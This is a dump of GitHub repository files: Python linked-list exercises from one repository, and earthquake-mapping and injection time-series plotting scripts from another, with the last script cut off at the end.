"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef delete(head):\n if not head:\n return None\n else:\n temp = head.next\n del head\n return delete(temp)\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = delete(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5163043737411499,
"alphanum_fraction": 0.5625,
"avg_line_length": 25.285715103149414,
"blob_id": "f1c54f234b47b962339c32273c451e44445008aa",
"content_id": "cc8334db03746808cfcffd559e1377618c8bacb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 736,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 28,
"path": "/21_merge_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef merge(head1 , head2):\n l1 = LinkedList()\n while head1 or head2:\n if not head1:\n l1.insert_end(head2.val)\n head2 = head2.next\n elif not head2:\n l1.insert_end(head1.val)\n head1 = head1.next\n elif head1.val > head2.val:\n l1.insert_end(head2.val)\n head2 = head2.next\n else:\n l1.insert_end(head1.val)\n head1 = head1.next\n return l1\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l2 = LinkedList()\n CreateLinkedList(l2)\n l3 = merge(l1.head , l2.head)\n l3.display()\n \nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5906862616539001,
"avg_line_length": 23.058822631835938,
"blob_id": "15f17c3d82b9d65d8df99089b493d0922e3e7b4c",
"content_id": "e812f9c8798e98dbc408f92a508eed678b8bcb42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 408,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 17,
"path": "/8_insert_front.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList, Node\nclass linkedListMod(LinkedList):\n def insert_beg(self , val=0):\n new_node = Node(val)\n new_node.next = self.head\n self.head = new_node\ndef main():\n l1 = linkedListMod()\n l1.insert_beg(5)\n l1.insert_beg(6)\n l1.insert_beg(7)\n l1.insert_end(8)\n l1.display()\n l1.reverse()\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.45668449997901917,
"alphanum_fraction": 0.49625667929649353,
"avg_line_length": 22.174999237060547,
"blob_id": "0e13bb6c7beeb67794619f99837a809fb841b6cc",
"content_id": "73300b8baa08c57c512991cede360e700b4a0629",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 40,
"path": "/0_AddTwoNum.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def getNumber(self,l):\n num = 0\n i = 0\n temp = l\n while temp:\n num = num + ((10**i)*temp.val)\n temp = temp.next\n i+=1\n return num\n def addTwoNumbers(self, l1 , l2):\n num1 = self.getNumber(l1)\n num2 = self.getNumber(l2)\n add = num1+num2\n l = ListNode(add%10)\n temp = l\n add = add // 10\n while add!=0:\n l.next = ListNode(add%10)\n l = l.next\n add = add // 10\n return temp\n \n\nl1 = ListNode(2)\nl1.next = ListNode(4)\nl1.next.next = ListNode(3)\n###############\nl2 = ListNode(5)\nl2.next = ListNode(6)\nl2.next.next = ListNode(4)\nl = Solution().addTwoNumbers(l1,l2)\nwhile l:\n print(l.val)\n l = l.next\n "
},
{
"alpha_fraction": 0.6211812496185303,
"alphanum_fraction": 0.6334012150764465,
"avg_line_length": 23.450000762939453,
"blob_id": "f35498850d183fe027b291bdf5faa63cde2aa6d6",
"content_id": "152cbbd640902550216733b25aedfa26d0b94c7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 20,
"path": "/33_move_last_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef move_tail(head):\n if not head or not head.next:\n return head\n temp_head = head\n while head.next.next:\n head = head.next\n temp_node= head.next\n head.next = None\n temp_node.next = temp_head\n return temp_node\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = move_tail(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n\n\n"
},
{
"alpha_fraction": 0.45842957496643066,
"alphanum_fraction": 0.49191686511039734,
"avg_line_length": 25.24242401123047,
"blob_id": "b06ee395bb2f5da31f46bf874c1dfe235e97a034",
"content_id": "f1d7f84c943eec1dec405768e51acf5d88ad8694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/alone.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "import datetime \nimport time\ndef alone():\n now = datetime.datetime.now()\n a = datetime.datetime(now.year, now.month, now.day,\n now.hour, now.minute, now.second)\n b = datetime.datetime(2021, 1, 1, 23, 56, 10) \n c = a-b\n sec = int(c.total_seconds() % 60)\n s = \" seconds \"\n if sec==1:\n s = \" second \"\n minutes = c.total_seconds() // 60\n hours = minutes // 60\n minutes = int(minutes % 60)\n m = \" minutes \"\n if minutes==1:\n m = \" minutes \"\n days = int(hours // 24)\n d = \" days \"\n if days==1:\n d = \"day\"\n hours = int(hours % 24 )\n h = \" hours \"\n if hours==0:\n h = \" hour \"\n print(\"Alone : \"+str(days)+d+str(hours)+h+str(minutes)+m+str(sec)+s)\ndef main():\n while True:\n alone()\n time.sleep(1)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5327978730201721,
"alphanum_fraction": 0.5662650465965271,
"avg_line_length": 23.09677505493164,
"blob_id": "91836191ce1847c6e9c3b156122ac6e063ab815f",
"content_id": "281e9089d8316d1f2359adc2a822ea6a2cab3420",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 31,
"path": "/34_insert_linkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef insert(head1 , head2 , k):\n c = 1\n while head1 and c<=k-1:\n head1 = head1.next\n c += 1\n if not head1:\n return\n temp = head1.next\n last_node = None\n while head2:\n last_node = head1\n head1.next = head2\n head1 = head1.next\n head2 = head2.next\n while temp:\n last_node.next = temp\n temp = temp.next\n last_node = last_node.next\n \ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n k = int(input(\"Enter the value of k : \"))\n insert(l1.head , l2.head , k)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6096997857093811,
"alphanum_fraction": 0.6212471127510071,
"avg_line_length": 24.52941131591797,
"blob_id": "142904b96d8918ffdd530bd557c1b27a1e001b99",
"content_id": "230aa71626ede1683b4280505decb0760f2e05d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/30_remove_duplicates.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef remove_duplicates(head):\n while head:\n temp = head.next\n while temp and temp.val==head.val:\n temp = temp.next\n head.next = temp\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n remove_duplicates(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5638095140457153,
"alphanum_fraction": 0.569523811340332,
"avg_line_length": 24.047618865966797,
"blob_id": "a3d9844fb97f18dc6c3f644a70aedc6900573af8",
"content_id": "548075ed84601508677a35ef98e518c20777d064",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/29_smallest_large.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef find_max_min(head):\n if not head:\n return None , None\n MAX = MIN = head.val\n while head:\n if head.val>MAX:\n MAX = head.val\n elif head.val < MIN:\n MIN = head.val\n head = head.next\n return MAX , MIN\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n MAX , MIN = find_max_min(l1.head)\n print(\"MAX = \",MAX)\n print(\"MIN = \",MIN)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5973742008209229,
"alphanum_fraction": 0.6061269044876099,
"avg_line_length": 27.5625,
"blob_id": "c9879de41f5d036de4eba5fc33e219b6473489b0",
"content_id": "4c5f27bb0b76769f5d5b6fc2db953d971e022e0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 16,
"path": "/16_search_linkedlist_iterative.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef serach(head , key):\n while head:\n if head.val == key:\n return True\n head = head.next\n return False\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n key = int(input(\"Enter the key to search : \"))\n print(\"%d is in the linked list : %s\" % (key, str(serach(l1.head, key))))\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4432748556137085,
"alphanum_fraction": 0.4526315927505493,
"avg_line_length": 24.909090042114258,
"blob_id": "c57e5873c8a3db6affa02c944ed131b473bdea48",
"content_id": "abc32aba864a5429aae9f2e98dafe291f4e5ed95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1710,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 66,
"path": "/3_odd_even_together.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def inset_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\n def odd_even_together(self):\n new_l = LinkedList()\n temp = self.head\n while temp:\n if temp.val %2 == 1:\n new_l.inset_end(temp.val)\n temp = temp.next\n temp = self.head\n while temp:\n if temp.val %2 == 0:\n new_l.inset_end(temp.val)\n temp = temp.next\n return new_l\n \ndef main():\n num = input(\"Enter the number : \")\n l1 = LinkedList()\n for i in num:\n l1.inset_end(int(i))\n l2 = l1.odd_even_together()\n l2.display()\n \nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5630252361297607,
"alphanum_fraction": 0.5764706134796143,
"avg_line_length": 22.84000015258789,
"blob_id": "f1322dfa85d1a59ecf92ac6efd233630d2082c01",
"content_id": "aacc53e483d8ec61feb99dcf92ba1ae3bd61e75a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 25,
"path": "/38_string_palindrome.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef getString(head):\n Str = \"\"\n while head:\n Str += head.val\n head = head.next\n return Str\ndef isPalindrome(head):\n Str = getString(head)\n # print(str)\n l = len(Str)\n i = 0\n while i < (l // 2):\n if Str[i] != Str[l-i-1]:\n return False\n i+=1\n return True\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1,func=str)\n l1.display()\n print(\"is linkedlist form a palindrome : \",isPalindrome(l1.head))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6328125,
"alphanum_fraction": 0.6484375,
"avg_line_length": 33.13333511352539,
"blob_id": "c71d67476b98c1ab92c84fc4acd0d99cd583355b",
"content_id": "a368193b4196980a215cc6f4a626906f47af3ed0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/13_length_recursive.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def length_recursive(self , node):\n if not node:\n return 0\n else:\n return 1 + self.length_recursive(node.next)\ndef main():\n l1 = LinkedListMod()\n print(\"Length of linked list is = %d\"%(l1.length_recursive(l1.head)))\n CreateLinkedList(l1)\n print(\"Length of linked list is = %d\"%(l1.length_recursive(l1.head)))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5524861812591553,
"alphanum_fraction": 0.5690608024597168,
"avg_line_length": 29.16666603088379,
"blob_id": "a84dbd97887616ce2164ad592f62178ab39bd247",
"content_id": "38b1d372c3761431b62fe956ec81adb5c407a7b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 6,
"path": "/LinkedListHelper.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "def CreateLinkedList(l1, func=int):\n print(\"Enter the number : \",end=\"\")\n num = [func(x) for x in input().split(\" \")]\n for i in num:\n l1.insert_end(i)\n return l1\n"
},
{
"alpha_fraction": 0.5173333287239075,
"alphanum_fraction": 0.5393333435058594,
"avg_line_length": 25.3157901763916,
"blob_id": "b7e3fac840e0f92d38dc992a3ab5658ff18372e3",
"content_id": "c8b83fdd41bfe66da73c7e2c7f1ad162a5e5858b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1500,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 57,
"path": "/18_detect_loop_del_loop.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\n\nclass LinkedListMod(LinkedList):\n def display(self , len):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is : \", end=\"\")\n count = 0\n while temp and count < len+2:\n print(str(temp.val)+\"->\", end=\"\")\n temp = temp.next\n count += 1\n if temp:\n print(\" ............\")\n print(\"None\")\n\ndef detect_remove_loop(head):\n slow = head\n fast = head.next\n while slow and fast and slow != fast:\n if not fast.next:\n return False\n slow = slow.next\n fast = fast.next.next\n if not slow or not fast:\n return False\n temp1 = head\n temp2 = fast\n while temp1 and temp2:\n while temp2!=temp1 and temp2.next!=fast:\n temp2 = temp2.next\n if temp1==temp2:\n break\n temp1 = temp1.next\n temp2 = fast\n while temp2.next != temp1:\n temp2 = temp2.next\n temp2.next = None\n return True\n \ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n l = l1.length()\n n = int(input(\"Enter the pos of loop : \"))\n if l1.getIndex(n):\n tail = l1.get_tail()\n tail.next = l1.getIndex(n)\n l1.display(l)\n detect = detect_remove_loop(l1.head)\n print(\"Is their any loop : \",detect)\n l1.display(10)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5101625919342041,
"alphanum_fraction": 0.5325203537940979,
"avg_line_length": 20.434782028198242,
"blob_id": "769a2ebb587593022e2391a9f1353b3511155473",
"content_id": "b67b9cf43df9d55d917d8b68d519ee04882c87bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 23,
"path": "/28_sort_012.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort(head):\n arr = [0] * 3\n temp = head\n while temp:\n arr[temp.val] += 1\n temp = temp.next\n temp = head\n for i in range(3):\n while arr[i]>0:\n temp.val = i\n temp = temp.next\n arr[i] -= 1\n \ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n sort(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5008090734481812,
"alphanum_fraction": 0.5056634545326233,
"avg_line_length": 23.235294342041016,
"blob_id": "89146dd6fa524d9374e3d7fcae5a1e5b9314b68d",
"content_id": "8265b7e3b5f8ef8c8fa301a6b8fed003de7a7994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 51,
"path": "/20_swap_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef swap(head , x , y):\n prev_x = None\n cur_x = head\n while cur_x and cur_x.val != x:\n prev_x = cur_x\n cur_x = cur_x.next\n if not cur_x:\n print(\"%d not in Linkedlist.\"%x)\n return\n \n cur_y = head\n prev_y = None\n while cur_y and cur_y.val != y:\n prev_y = cur_y\n cur_y = cur_y.next\n if not cur_y:\n print(\"%d not in Linkedlist.\" % y)\n return\n if not prev_x:\n temp = cur_y.next\n cur_y.next = cur_x.next\n cur_x.next = temp\n prev_y.next = cur_x\n return cur_y\n elif not prev_y:\n temp = cur_y.next\n cur_y.next = cur_x.next\n cur_x.next = temp\n prev_x.next = cur_y\n return cur_x\n else:\n temp = cur_y.next\n cur_y.next = cur_x.next\n prev_y.next = cur_x\n cur_x.next = temp\n prev_x.next = cur_y\n return head\n \n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n x , y = input(\"Enter the x and y : \").split(\" \")\n x , y = int(x) , int(y)\n l1.display()\n l1.head = swap(l1.head , x , y)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6009389758110046,
"alphanum_fraction": 0.6079812049865723,
"avg_line_length": 24.058822631835938,
"blob_id": "8f35dd06f8b9d5f023d022af8fd2c3e3e54ac8cb",
"content_id": "84efb47883d78c1ed534b4253030dd32e2e119c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/50_pribt_alternate.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef print_alternative(head):\n if not head:\n return\n print(\"Values are : \",end=\"\")\n while head:\n print(head.val,end=\" \")\n if not head.next:\n return\n head = head.next.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print_alternative(l1.head)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4435611963272095,
"alphanum_fraction": 0.45045045018196106,
"avg_line_length": 24.513513565063477,
"blob_id": "4f9461603e5eb53bc10f7a18f40ddfee64e9fa23",
"content_id": "589e706d0e185857a544f833b3217c233644be8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1887,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 74,
"path": "/LinkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def insert_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n print()\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\n def length(self):\n count = 0\n temp = self.head\n while temp:\n count += 1\n temp = temp.next\n return count\n def get_tail(self):\n temp = self.head\n if not temp:\n return None\n while temp.next:\n temp = temp.next\n return temp\n def getIndex(self , k):\n count = 0\n temp = self.head\n if k < 0:\n return None\n while count < k and temp:\n temp = temp.next\n count += 1\n if count != k:\n return None\n if not temp:\n return None\n return temp\n def insert_beg(self , val=0):\n new_node = Node(val)\n new_node.next = self.head\n self.head = new_node"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6126582026481628,
"avg_line_length": 23.6875,
"blob_id": "7cb4bb0d9c836ef7095fcdc0a866fed1b858d66d",
"content_id": "8dca19d3a39fe5be56fb16f016e0bb56440016a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 16,
"path": "/37_swap_pair.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef swap(head):\n while head:\n if not head.next:\n return\n head.val, head.next.val = head.next.val , head.val\n head = head.next.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n swap(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
}
] | 48 |
roshan-koirala/ProgrammingTools | https://github.com/roshan-koirala/ProgrammingTools | 8d4be6e22c41abb605bdc7d1c230c689cd77ab53 | 2f40a40692a5258fcc390874b5a35475bd021420 | 6c6b1da5a0cef1155051576100945ffa5ec713d1 | refs/heads/master | 2020-12-23T20:29:58.686801 | 2020-05-06T13:52:14 | 2020-05-06T13:52:14 | 237,265,803 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.843137264251709,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 24.5,
"blob_id": "d227f18b458e3b39c04acfd3cedfdf8da8b2ecbd",
"content_id": "7a8b7fe4173f799f026d3ecb788c91ad67df6126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "# ProgrammingTools\nThe materials from a coursework\n"
},
{
"alpha_fraction": 0.5082518458366394,
"alphanum_fraction": 0.5666258931159973,
"avg_line_length": 38.409637451171875,
"blob_id": "96eb6bac29eb85cf88970ade2fd3130235bf52f9",
"content_id": "a34baefef8635a5bf023f2d6bbf8e2788ebc86be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3272,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 83,
"path": "/Earthquake_distribution.py",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "#! python3\n\n\"\"\"\nPlotting the earthquakes in the area \n- For the receent active area (small area)\n- For the longerr time period from old catalog\n\n@ Author: Roshan Koirala\n\"\"\"\n\n#================================================================================\n# Modules\n#================================================================================ \nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n#================================================================================\n# Plotting The Earthquakes around 4.8 ML \n#================================================================================ \nfig = plt.figure(figsize=(10, 10))\nmap = Basemap(llcrnrlat=31.65,urcrnrlat=31.74,llcrnrlon=-104.1,urcrnrlon=-104.,\n projection='tmerc', lat_1=31.67, lat_2=32, lat_0=31, lon_0=-104.05, resolution='c')\n\nmap.drawstates(color='black' )\nmap.drawlsmask(land_color='0.8', grid=5,lakes=True)\nmap.drawrivers(color='navy')\nmap.drawparallels(np.arange(31.66, 31.74, 0.02),labels = (False,True,False,True))\nmap.drawmeridians(np.arange(-104.08, -104, 0.02),labels = (False,True,False,True))\n\n# plot earthquakes\ndf = pd.read_csv('texnet_events.csv')\ntx_lat = df['Lat'].tolist()\ntx_lon = df['Lon'].tolist()\nmagnitude = df['Mag'].tolist()\ndepth = df['Depth'].tolist()\n\nx,y = map(tx_lon,tx_lat)\nmap.scatter(x, y, s=60, c=depth)\nc = plt.colorbar(orientation='horizontal', fraction=0.044, pad=0.05)\nc.set_label(\"Depth\")\n\ndf = pd.read_csv('Well_location.csv')\nwell_lat = df['Lat'].tolist()\nwell_lon = df['Lon'].tolist()\nwell_depth = df['Depth'].tolist()\n\nmap.scatter( well_lon,well_lat,label='Wells ', latlon=True, s=100, color='r', marker='s', alpha=1, edgecolor='k', zorder=4)\n\n\nmap.scatter(-104.0519,31.7033,label='4.8 ML | 6.0 KM ', latlon=True, s=400, marker='*', alpha=1, edgecolor='k', zorder=3)\nplt.title('Earthquake Around the 4.8 ML Epicenter (2018 - Date)', fontweight=\"bold\")\nplt.legend(loc='lower right')\nplt.savefig(\"Eq_around_epi.png\", dpi=500)\nplt.show()\n\n#================================================================================\n# Plotting The Earthquakes For Bigger area\n#================================================================================ \nfig = plt.figure(figsize=(12, 12))\nmap = Basemap(llcrnrlat=29.0,urcrnrlat=34.0,llcrnrlon=-107.0,urcrnrlon=-98.0,\n projection='tmerc', lat_1=31.00, lat_2=33.00, lat_0=31, lon_0=-104.05, resolution='c')\n\nmap.drawstates(color='red', linewidth = 3)\nmap.drawlsmask(land_color='lightgrey', grid=5,lakes=True)\nmap.drawrivers(color='navy')\nmap.drawparallels(np.arange(30., 34., 1.),labels = (False,True,False,True))\nmap.drawmeridians(np.arange(-107., -98, 1.),labels = (False,True,False,True))\n\n# plot earthquakes\ndf = pd.read_csv('All_catalog.csv')\ntx_lat = df['Lat'].tolist()\ntx_lon = df['Lon'].tolist()\n\n\nx,y = map(tx_lon,tx_lat)\nmap.scatter(x, y, s=10, label='Earthquakes',)\nmap.scatter(-104.0519,31.7033,label='4.8 ML', latlon=True, s=400, marker='*', alpha=1, edgecolor='k', zorder=3)\nplt.title('Earthquake Distribution - West Texas (2000 - 2017)', fontweight=\"bold\")\nplt.legend(loc='lower right')\nplt.savefig(\"Eq_all.png\", dpi=500)\nplt.show()\n\n"
},
{
"alpha_fraction": 0.4261859655380249,
"alphanum_fraction": 0.48576849699020386,
"avg_line_length": 29.287355422973633,
"blob_id": "bd7a1f8e1cf1b5520c24511713fa01a74cc6a0dc",
"content_id": "f1413cb2af2d9b196c7f9ed62118582bab6800cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2635,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 87,
"path": "/Time_series.py",
"repo_name": "roshan-koirala/ProgrammingTools",
"src_encoding": "UTF-8",
"text": "# Python3.7\n# author- Roshan KOirala\n\"\"\"\n Plot Earthquake and Injection Time series\n\n\"\"\"\n#==============================================================================\n# Modules\n#==============================================================================\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#==============================================================================\n# Load data\n#==============================================================================\n# Input Files\nfile_recent = 'texnet_events.csv'\nfile_all = 'All_catalog.csv'\nfile_injection = 'Injection.csv'\n\n#==============================================================================\n# plot earthquakes\ndf = pd.read_csv(file_recent)\ndate_eq_recent = df['Date'].tolist()\nmag_eq_recent = df['Mag'].tolist()\n\n\ndf = pd.read_csv(file_all)\ndate_eq_all = df['Date'].tolist()\nmag_eq_all = df['Mag'].tolist()\n\ndf = pd.read_csv(file_injection)\ndate_inj = df['Date'].tolist()\ninj_10932828 = df['10932828'].tolist()\ninj_10933170 = df['10933170'].tolist()\ninj_38938320 = df['38938320'].tolist()\ninj_38930873 = df['38930873'].tolist()\n\n###============================================================================\nfig, ax1 = plt.subplots()\n\n\nax1.plot(date_inj, inj_38930873, 'orange',label='API_38930873')\nax1.plot(date_inj, inj_10933170, 'b', label='API_10933170')\nax1.plot(date_inj, inj_38938320, 'c', label='API_38938320')\nax1.plot(date_inj, inj_10932828, 'k', label='API_10932828')\n\nax2 = ax1.twinx()\nax2.stem(date_eq_recent, mag_eq_recent, 'r', markerfmt='o')\n\nax1.set_xlabel('Year')\nax2.set_ylabel('Recent Earthquake', color='g')\nax1.set_ylabel('Injection Volume (Barrel)', color='b')\nax1.legend(loc='upper left')\n\nplt.show()\n\n\n#==============================================================================\ndir_out = 'plots'\nplot_recent_1 = '4well_injection.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_recent_1))\n#==============================================================================\n\nfig, ax1 = 